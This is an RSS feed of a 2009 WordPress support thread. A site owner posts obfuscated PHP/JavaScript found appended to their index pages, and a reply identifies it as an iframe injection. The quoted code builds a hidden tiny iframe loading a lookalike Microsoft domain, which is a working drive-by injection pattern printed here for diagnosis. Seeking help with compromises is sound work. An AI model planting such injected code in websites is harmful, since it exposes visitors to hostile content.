http://wordpress.org/support/ WordPress › Support Topic: PHP Security Hole? en Thu, 26 Nov 2009 13:14:27 +0000 http://wordpress.org/support/topic/286582#post-1126156 Sat, 04 Jul 2009 19:53:10 +0000 iridiax 1126156@http://wordpress.org/support/ <p>It's an iframe insertion from a Chinese website. For more info, see:</p> <p><a href="http://wordpress.org/support/topic/281767" rel="nofollow">http://wordpress.org/support/topic/281767</a> </p> http://wordpress.org/support/topic/286582#post-1125964 Sat, 04 Jul 2009 16:00:45 +0000 DVeditor 1125964@http://wordpress.org/support/ <p>Hey all,</p> <p>Logged in this morning to see our index pages had been altered...the end of each had this code attached:</p> <p><code>&lt;?php echo &#39;&lt;script&gt;document.write(&quot;&lt;if&quot;+&#39;&#39;+&#39;ra&#39;+&#39;&#39;+&quot;m&quot;+&#39;e s&#39;+&quot;rc=\&quot;h&quot;+&#39;&#39;+&#39;tt&#39;+&quot;p:&quot;+&#39;&#39;+&quot;/&quot;+&#39;&#39;+&#39;/mic&#39;+&quot;roso&quot;+&#39;t&#39;+&#39;&#39;+&#39;f.c&#39;+&quot;n&quot;+&#39;/&#39;+&quot;\&quot; wid&quot;+&#39;&#39;+&#39;th=1 he&#39;+&quot;igh&quot;+&#39;&#39;+&#39;t&#39;+&quot;=&quot;+&quot;2&gt;&lt;/i&quot;+&#39;&#39;+&quot;f&quot;+&quot;ra&quot;+&#39;&#39;+&quot;&quot;+&#39;&#39;+&quot;me&quot;+&#39;&gt;&#39;);&lt;/script&gt;&#39;; ?&gt;</code></p> <p>Any ideas what this was intending to do? I'm patching to the latest version now, but for a non-destructive hack it was pretty disruptive. Basically rendered the entire index file useless.</p> <p>If anyone has any ideas please let me know! </p>